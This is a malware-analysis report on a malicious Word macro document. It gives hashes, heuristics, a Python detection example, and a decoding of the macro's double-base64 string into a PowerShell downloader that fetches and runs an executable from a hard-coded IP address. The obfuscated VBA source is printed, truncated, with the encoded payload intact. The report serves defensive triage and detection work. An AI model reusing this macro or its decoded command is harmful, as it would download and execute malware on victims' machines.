Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 136922c7bd76aa5e…

MALICIOUS

Office (OLE)

Size: 206.0 KB
Created: 2017-12-06 03:23:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: a975df206268f854e4c44f9ab2d0a74c
SHA-1: a2327d8f023bef163e0fc48573431248e45c10a1
SHA-256: 136922c7bd76aa5ebc2e508b5ded77c3ea5ead7a035b51e8f2edff1bb233f09c
Risk score: 224

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The document carries VBA macros with a Document_Open handler, so the code runs as soon as the user enables macros; no further click is needed (that enable-content step is what T1204.002 covers). The heuristics below report a Shell() call in the compiled p-code. The source preview is truncated before that point, so the call itself is not visible in the listing, but the handoff to it is: Document_Open builds a string from six literals (OrNw5zM, qjqP5c, edbLJZ, q5Gl2Zd, UPHGX7, TWi9Qcvg) joined with &, stores the result in de1Xu and passes it to the routine sex in module E6yZucl. Everything else in the two routines is filler aimed at signature and heuristic scanners: Array() literals indexed into variables that are never used, and If Len("...") <> N blocks whose Else branch (a MsgBox) can never run, because every literal is at most nine characters long and N is between 162 and 251. ClamAV's Doc.Macro.Obfuscation-6332451-0 keys on that pattern. The concatenated literal is base64 applied twice; decoding it yields a cmd /k one-liner that spells powershell out of two environment variables (set _POWER=power&& set _SHELL=shell&& call %_POWER%%_SHELL%) to keep the word out of the macro text, then uses System.Net.WebClient.DownloadFile to fetch http://190.14.38.87/eng.up into %TEMP%\~tmp.exe and starts it with Start-Process inside a try/catch. The macro is therefore a downloader for a second-stage executable (PowerShell, T1059.001, and Ingress Tool Transfer, T1105, in ATT&CK terms, neither of which the automated mapping above lists), and the URL and host are the indicators to pivot on.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6332451-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0. As the signature name says, it keys on the macro obfuscation pattern rather than on any payload indicator.
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code. On its own this is only a precondition; the findings below are what make the macro malicious.
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    The macro calls the VBA Shell() function, which starts an external program. The call is not in the truncated source preview below; the p-code finding next corroborates it.
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open is an auto-execution entry point: Word runs it when the document is opened with macros enab­led, so no further user action is required.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches documents whose macro exists only as p-code, or whose source extraction fails, so that no readable source is available.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI present in virtually every Office file and is not a network indicator for this sample. The actual download URL is inside the base64 string in the macro and is not listed here because it only exists after decoding.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17871 bytes
SHA-256: ee193471b1a85815ed58f2cd04f77e00d0caf7e057ba81f775a97159fd0e26f3
Detection: ClamAV: No threats found. The Doc.Macro.Obfuscation signature fired on the document container, not on the decoded source text, so a clean result here does not contradict it.
Obfuscation or payload: likely. The carved artifact contains 2 long base64-like blobs.
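Added example, not part of the analyzer or of oletools: a Python triage pass that approximates the two checks reported above, the OLE_VBA_PCODE_AUTOEXEC_EXEC rule (an auto-exec token AND an execution/download token, both required) and the long base64-literal count behind "Obfuscation or payload: likely". It runs over a text dump such as olevba output or strings pulled from the compiled stream, not over p-code opcodes; the token lists and the 100-character blob threshold are this example's own assumptions; and both input macros are constructed: the first mirrors the shape of this sample and includes the Shell call the truncated preview does not show, the second is an auto-exec handler with nothing to execute, which must not fire.

```python
import re

# Token lists are this example's approximation of the report's rule text
# ("an auto-execution token together with shell/download/object-execution
# tokens"); the analyzer's real lists are not published on the page.
AUTOEXEC_TOKENS = ('Document_Open', 'Document_Close', 'AutoOpen', 'Auto_Open',
                   'AutoClose', 'AutoExec', 'Workbook_Open')
EXEC_TOKENS = ('Shell', 'WScript.Shell', 'ShellExecute', 'CreateObject',
               'GetObject', 'powershell', 'cmd.exe', 'URLDownloadToFile',
               'MSXML2.XMLHTTP', 'ADODB.Stream')

# Quoted literal made only of base64-alphabet characters, at least N long.
B64_BLOB_TEMPLATE = r'"([A-Za-z0-9+/]{%d,}={0,2})"'


def find_tokens(text, tokens):
    """Case-insensitive whole-token search (VBA is case-insensitive). A token
    must not be glued to an identifier character or a dot on either side, so
    the bare 'Shell' does not fire on the '.Shell' inside 'WScript.Shell'."""
    found = []
    for tok in tokens:
        if re.search(r'(?<![\w.])' + re.escape(tok) + r'(?!\w)', text, re.I):
            found.append(tok)
    return found


def triage_vba(text, b64_min_len=100):
    """Two static checks over a VBA text dump.

    autoexec_exec     True only if an auto-exec entry point AND an execution or
                      download token both occur; either alone is not enough.
    b64_blobs         number of quoted literals of at least b64_min_len chars
                      drawn from the base64 alphabet (threshold is an assumption).
    """
    autoexec = find_tokens(text, AUTOEXEC_TOKENS)
    execs = find_tokens(text, EXEC_TOKENS)
    blobs = re.findall(B64_BLOB_TEMPLATE % b64_min_len, text)
    return {
        'autoexec_tokens': autoexec,
        'exec_tokens': execs,
        'autoexec_exec': bool(autoexec) and bool(execs),
        'b64_blobs': len(blobs),
        'b64_blob_lengths': sorted(len(b) for b in blobs),
    }


# Constructed sample 1: same shape as the page's macro (auto-exec handler, long
# base64 literals, a junk Len() block) plus the Shell call the heuristics report
# but the truncated preview does not show. The literals are placeholders.
SAMPLE_WITH_EXEC = '''
Sub Document_Open()
OrNw5zM = "%s"
qjqP5c = "%s=="
If Len("AKUXJp8N3") <> 198 Then
Else
MsgBox "Q0BbEgZa", 26, "R9VeS"
End If
de1Xu = OrNw5zM & qjqP5c
Shell de1Xu, vbHide
End Sub
''' % ('A' * 120, 'B' * 200)

# Constructed sample 2: an auto-exec handler with no execution primitive, the
# pattern a benign template or add-in also produces. The rule must not fire.
SAMPLE_AUTOEXEC_ONLY = '''
Sub Document_Open()
MsgBox "Welcome", vbInformation, "Template"
End Sub
'''

if __name__ == '__main__':
    for label, src in (('with exec', SAMPLE_WITH_EXEC),
                       ('autoexec only', SAMPLE_AUTOEXEC_ONLY)):
        print(label, triage_vba(src))
```

With the assumed threshold the first sample yields two blobs, the same count the report gives for macros.bas; lowering it to 50 would also count a 58-character literal such as OrNw5zM in the real macro, which is why a blob count is an "info" signal rather than a detection on its own. The AND in autoexec_exec is the part worth keeping: Document_Open by itself is how templates and add-ins behave.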
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim AuC23L
AuC23L = Array("qn4lE", "mqRvNg", "xw0riC")
uJ0wLSXn = AuC23L(1)
Dim ktDI5E1x
ktDI5E1x = Array("X7itm", "pb6vOkAn", "H8qgd7Wj")
PycKPdl = ktDI5E1x(0)
OrNw5zM = "WTIxa0lDOXJJSE5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ1gxTk"
qjqP5c = "lSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYMUJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04wSUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVNQzR4TkM0ek9DNDROeTlsYm1jdWRY"
edbLJZ = "QW5MbE53YkdsMEtDY3NKeWs3SkhCaGRHZ2dQU0FrWlc1Mk9uUmxiWEFnS3lBblhINTBiWEF1WlhobEp6dG1iM0psWVdOb0tDUnRlWFZ5YkNCcGJpQWtiWGwxY214ektYdDBjbmw3SkhkbFltTnNhV1Z1ZEM1RWIzZHViRzloWkVacGJHVW9KRzE1ZFhKc0xsUnZVM1J5YVc1bktDa3NJQ1J3WVhSb0tUdFRkR0Z5ZEMxUWNtOWpaWE"
Dim Y6PxqImoc
Y6PxqImoc = Array("Polmgs", "HbHB1", "dhizsH")
vEJN89Ui = Y6PxqImoc(0)
Dim UyB8wIY1
UyB8wIY1 = Array("xrDHNUqA", "niR2o")
iFszGy = UyB8wIY1(1)
Dim PDX9V
PDX9V = OrNw5zM & qjqP5c & edbLJZ
q5Gl2Zd = "56SUNSd"
UPHGX7 = "1lYUm9PMkp5WldGck8zMWpZWFJqYUh"
TWi9Qcvg = "0OWZRPT0="
If Len("AKUXJp8N3") <> 198 Then
' HlcewY8
Else
' B0KUAZid1
MsgBox "Q0BbEgZa", 26, "R9VeS"
End If
Dim iO8XI6dj
iO8XI6dj = q5Gl2Zd & UPHGX7 & TWi9Qcvg
Dim Yp8CF4
Yp8CF4 = Array("owhIVA795", "TeKyD4", "ymYx5rfP6")
kqWNhl = Yp8CF4(2)
Dim A9Au8z
A9Au8z = Array("WMrER3", "zbdvXGq")
lmser = A9Au8z(0)
Dim h5xmSRrA
h5xmSRrA = Array("fL7SmBnuI")
rhwUQCOXt = h5xmSRrA(0)
de1Xu = PDX9V & iO8XI6dj

Dim J5MNaXA2
J5MNaXA2 = Array("rGw5yKVen")
bQT0Pu = J5MNaXA2(0)
If Len("vKhdsvbr") <> 200 Then
' W1ayCdXu
Else
' OASUvq
MsgBox "zzicGV", 38, "he4R95DGW"
End If
Dim FR5r8J
FR5r8J = Array("Vk4Ff", "GAUER", "KkiUgtyHT")
LN97xQ = FR5r8J(2)
Dim h1fnxa7
h1fnxa7 = Array("ZwmKho", "yDz39GE1", "qqDMwlCSB")
iwnhEe = h1fnxa7(1)
sex de1Xu
End Sub

Attribute VB_Name = "E6yZucl"
Sub sex(y7REXlks)
If Len("IncidID") <> 251 Then
' yH8sXE
Else
' RyEmJ
MsgBox "njIdu", 57, "ctb2rpHy"
End If
Dim xZKjBxL
xZKjBxL = Array("CtIBOfR", "gtNQF")
DUzQs8q = xZKjBxL(0)
Dim ipq6IhE
ipq6IhE = Array("Q3gKR", "BweHg")
TKwEvfn9 = ipq6IhE(1)

Dim Urlaxe0
Urlaxe0 = Array("TieOlcot7")
V2iVjNfIq = Urlaxe0(0)
If Len("TmAMqvQ7") <> 172 Then
' M5LgErx
Else
' kdKWUA8X
MsgBox "D8O9Chf", 60, "H6pm5lskw"
End If
If Len("mAvLz") <> 162 Then
' YSLQAYPo
Else
' y7NUz
MsgBox "odKoxm8nj", 53, "bOCt9xw"
End If
Dim RocGfF
RocGfF = Array("RndWz", "LzMsY")
ujetI = RocGfF(0)
If Len("gL7GkE") <> 215 Then
' Q4J5V
Else
' yolaCZ
MsgBox "ugaDb0n", 30, "YBwT9"
End If
Dim AUT9Y
AUT9Y = Array("J73EaLHZM", "ZmpSx")
mSdK3 = AUT9Y(0)
Dim H6mJWn
H6mJWn = Array("oSZcO5", "egKhOsP")
V6WOD8X4 = H6mJWn(0)
Dim G7WRIrP
G7WRIrP = Array("G5HvQex", "wJVkWoR", "MrT1jAM03")
M3lyx = G7WRIrP(1)
Dim nPIuO8
nPIuO8 = Array("dcP3RlCj", "fjQWM", "n0XC1")
iq36CA = nPIuO8(2)
Dim m06t5uVf
m06t5uVf = Array("jT9bjeJ", "HxbWDa8yV")
xvboieC0s = m06t5uVf(1)
If Len("yhyS2uW") <> 165 Then
' AiKJAEXL
Else
' Af2MYkrc
MsgBox "WjAe3F", 47, "bXz6lS"
End If

Dim ngQNh7e
ngQNh7e = Array("aM4IsWn")
aH2jeBgP = ngQNh7e(0)
If Len("cNSzHr") <> 169 Then
' YiBGC
Else
' Dz39Q1
MsgBox "URvhCU", 43, "YWhU6"
End If
If Len("Lgjo0MtRr") <> 169 Then
' ShqED
Else
' IJqpdYxK
MsgBox "qUIit1R", 43, "PSBNIz"
End If

Dim kIgpOlaYD
kIgpOlaYD = Array("oSkAL7")
oBvjJ = kIgpOlaYD(0)
Dim hVeO1aMjN
hVeO1aMjN = Array("CQBGYvZVj", "KYGOFa", "qly1I")
muZd6Yex2 = hVeO1aMjN(0)
Dim P5mPQF
P5mPQF = Array("iM7APVpQu")
A2mZIb = P5mPQF(0)
Dim R1Ji97n
R1Ji97n = Array("g8iLFZ", "lgdKTlqN")
mmaoK = R1Ji97n(1)

Dim MgpGB
MgpGB = Array("SIyhns")
ArDNxZ = MgpGB(0)

Dim vjKP2
vjKP2 = Array("mVGuZ")
DP6Evf = vjKP2(0)
Dim Pajxz0H49
Pajxz0H49 = Array("du8XFxoQ1", "KF7TRmn")
Pb69zf = Pajxz0H49(0)
Dim wZvMf
wZvMf = Array("Cuz4U0Ly7", "hHg9qyIA", "qi7qKs")
acds
... (truncated)